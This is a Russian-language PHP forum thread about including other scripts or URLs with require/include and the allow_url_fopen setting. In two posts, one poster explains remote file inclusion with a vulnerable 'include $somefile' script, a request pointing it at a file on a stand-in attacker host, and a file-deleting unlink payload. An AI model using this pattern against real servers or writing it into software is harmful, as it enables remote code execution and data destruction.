powered by simpleCommunicator - 2.0.61     © 2026 Programmizd 02
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / (PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
11 сообщений из 11, страница 1 из 1
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33487064
DIEV.ru
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Код: plaintext
1.
2.
<?
  [перейти на www.sql.ru]
?>
как это будет выглядеть?
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33487186
Еретик
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
<?php

require 'prepend.php';

require $somefile;

require ('somefile.txt');

?>


Или то же самое с include()

URL можно вызывать, если для виртуального хоста или глобально установлен флаг allow_url_fopen (в php.ini или в конфигурационных файлах апача - httpd.conf, .htaccess)


Код: plaintext
 allow_url_fopen On 
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33487187
Фотография lissyara
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Определитесь, что нужно - на мой взгляд несколько разные задачи.....


Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33487258
Фотография lissyara
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Не успел :)


Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33487786
Еретик
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Еретик
Код: plaintext
 allow_url_fopen On 


Забыл сказать, что это дыра в безопасности, особенно если еще register_globals On
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488091
DocAl
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
С регистер_глобалс он -- это всё одна сплошная дыра...
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488306
twistfire
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
а не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488320
*
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
*
Гость
twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
www.php.net/registerglobals
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488383
Еретик
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:
Код: plaintext
1.
2.
3.
<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt


envy.txt на www.hacker.ru:
Код: plaintext
1.
2.
3.
<?
 unlink(*.*);
?>
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488493
*
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
*
Гость
Еретик twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:
Код: plaintext
1.
2.
3.
<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt


envy.txt на www.hacker.ru:
Код: plaintext
1.
2.
3.
<?
 unlink(*.*);
?>
А при чём тут register_globals? Дыра-то не в ней. Ну напишете вы
Код: plaintext
<?include $_GET['somefile']?>
- в плане безопасности это ничего не изменит (с тем же успехом $_POST/$_COOKIE/$_REQUEST).
...
Рейтинг: 0 / 0
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
    #33488666
twistfire
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
усе равно спасибо :)
...
Рейтинг: 0 / 0
11 сообщений из 11, страница 1 из 1
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / (PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]